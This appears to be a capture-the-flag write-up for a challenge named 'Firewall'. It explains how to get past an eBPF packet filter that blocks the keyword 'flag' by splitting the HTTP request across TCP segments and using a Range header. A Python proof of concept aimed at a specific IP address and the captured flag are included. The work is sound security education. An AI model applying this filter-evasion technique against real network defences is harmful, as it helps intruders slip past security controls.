CTF-Writeups

Firewall — Writeup

Summary

The eBPF tc filter scans each TCP packet payload for the lowercase keyword flag and the character %. It does not perform TCP stream reassembly. By splitting flag across packets and requesting only a byte range of /flag.html that contains the flag but not the lowercase keyword, we can retrieve the flag.

Key Observations

• The filter runs on both ingress and egress (tc/ingress attached twice).
• It scans each packet for flag and % only, and drops matching packets.
• It does not inspect or reassemble full HTTP/TCP streams.
• /flag.html contains the flag. The response body contains the text Here is your free flag: TEST{FLAG}.

Why It Works

1) Request bypass: Send GET /fl and ag.html in separate TCP packets so no single packet contains the substring flag. 2) Response bypass: Use Range: bytes=135- to start the response at the TEST{FLAG} portion. That response chunk contains no lowercase flag, so the egress filter allows it.

Exploit Steps

1. Open a TCP connection to the service.
2. Send the HTTP request in two TCP segments to split flag.
3. Include a Range header to avoid the lowercase keyword in the response.
4. Read the response body to get the flag.

Proof of Concept

import socket, time

host, port = "35.227.38.232", 5000
s = socket.create_connection((host, port), timeout=5)
s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)

# Split "flag" across packets
s.sendall(b"GET /fl")
time.sleep(0.2)
s.sendall(
    b"ag.html HTTP/1.1\r\n"
    b"Host: 35.227.38.232\r\n"
    b"Range: bytes=135-\r\n"
    b"Connection: close\r\n\r\n"
)

resp = b""
while True:
    chunk = s.recv(4096)
    if not chunk:
        break
    resp += chunk
s.close()

print(resp.decode("latin1", errors="replace"))

Flag

uoftctf{f1rew4l1_Is_nOT_par7icu11rLy_R0bust_I_bl4m3_3bpf}